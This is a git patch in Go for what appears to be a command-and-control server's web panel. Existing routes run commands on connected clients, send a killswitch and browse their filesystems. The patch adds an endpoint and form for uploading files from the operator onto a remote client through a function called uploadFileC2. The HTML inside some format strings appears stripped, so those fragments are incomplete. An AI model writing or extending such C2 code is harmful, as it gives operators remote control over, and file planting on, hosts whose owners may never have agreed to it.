From 475deffb4c34511a494e40adcfeeedebb2bf04c0 Mon Sep 17 00:00:00 2001 From: raul Date: Tue, 18 Jun 2024 09:46:30 +0200 Subject: [PATCH] Allow uploading files from within the filesystem explorer --- cmd/httpServer.go | 77 ++++++++++++++++++++++++++++++++++++----- cmd/templates/style.css | 5 +++ 2 files changed, 74 insertions(+), 8 deletions(-) diff --git a/cmd/httpServer.go b/cmd/httpServer.go index e42c9e8..a1c1dd2 100644 --- a/cmd/httpServer.go +++ b/cmd/httpServer.go @@ -38,6 +38,7 @@ func WebServer() { r.GET("/command/:clientid", getCommands) r.GET("/fs/:clientid", getFilesystem) r.POST("/ls/:clientid", listFiles) + r.POST("/upload/:clientid", uploadFile) r.POST("/command/:clientid", execCMD) r.POST("/kill/:clientid", sendKillswitch) r.GET("/dump", dumpClients) @@ -50,6 +51,44 @@ func WebServer() { r.Run(":" + WebPort) } +func uploadFile(c *gin.Context) { + id := c.Param("clientid") + idInt, err := strconv.Atoi(id) + if err != nil { + c.String(http.StatusInternalServerError, "Error happened, please make this a proper error later") + return + } + + client, _, err := returnClient(idInt) + if err != nil { + return + } + + if client.IsOnline == false { + c.String(http.StatusOK, "Client is currently offline!") + return + } + + path, _ := c.GetPostForm("cmd") + file, err := c.FormFile("fileToUpload") + if err != nil { + log.Println(err) + } + + resp, err := uploadFileC2(*client, *file, path) + if err != nil { + e := fmt.Sprintf("Error happened executing command: %v\n", err) + c.String(http.StatusOK, e) + return + } + if resp.Successful != true { + e := fmt.Sprintf("Error happened executing command: %v\n", resp.Message) + c.String(http.StatusOK, e) + return + } + listFiles(c) +} + func listFiles(c *gin.Context) { id := c.Param("clientid") idInt, err := strconv.Atoi(id) @@ -69,14 +108,22 @@ func listFiles(c *gin.Context) { } path, _ := c.GetPostForm("cmd") - - resp, err := requestFiles(*client, path) - if err != nil { - e := fmt.Sprintf("Error happened executing command: %v\n", err) - c.String(http.StatusOK, e) - return - } var list string + + uploadSection := fmt.Sprintf(`
+ + + Upload progress: +
+ `, client.ClientID, path) + list += uploadSection + currentLocation := fmt.Sprintf("Current location: %v
", path) list += currentLocation @@ -90,9 +137,23 @@ func listFiles(c *gin.Context) { client.ClientID, parentFolder) list += parentFolderLink + resp, err := requestFiles(*client, path) + if err != nil { + e := fmt.Sprintf("Error happened executing command: %v\n", err) + list += e + c.String(http.StatusOK, list) + return + } + if resp.Successful != true { + e := fmt.Sprintf("Error happened executing command: %v\n", resp.Message) + list += e + c.String(http.StatusOK, list) + return + } + for _, v := range resp.FileList.File { if v.IsFolder == true { - entry := fmt.Sprintf("[DIR] %v
", + entry := fmt.Sprintf("[d] %v/
", client.ClientID, v.FullPath, v.Name) list += entry } else { diff --git a/cmd/templates/style.css b/cmd/templates/style.css index dc78d71..a03b2dd 100644 --- a/cmd/templates/style.css +++ b/cmd/templates/style.css @@ -105,6 +105,11 @@ form { text-align: center; } +form#uploader { + text-align: left; + margin-top: 10px; +} + td a.clickable { display: block; width: 100%;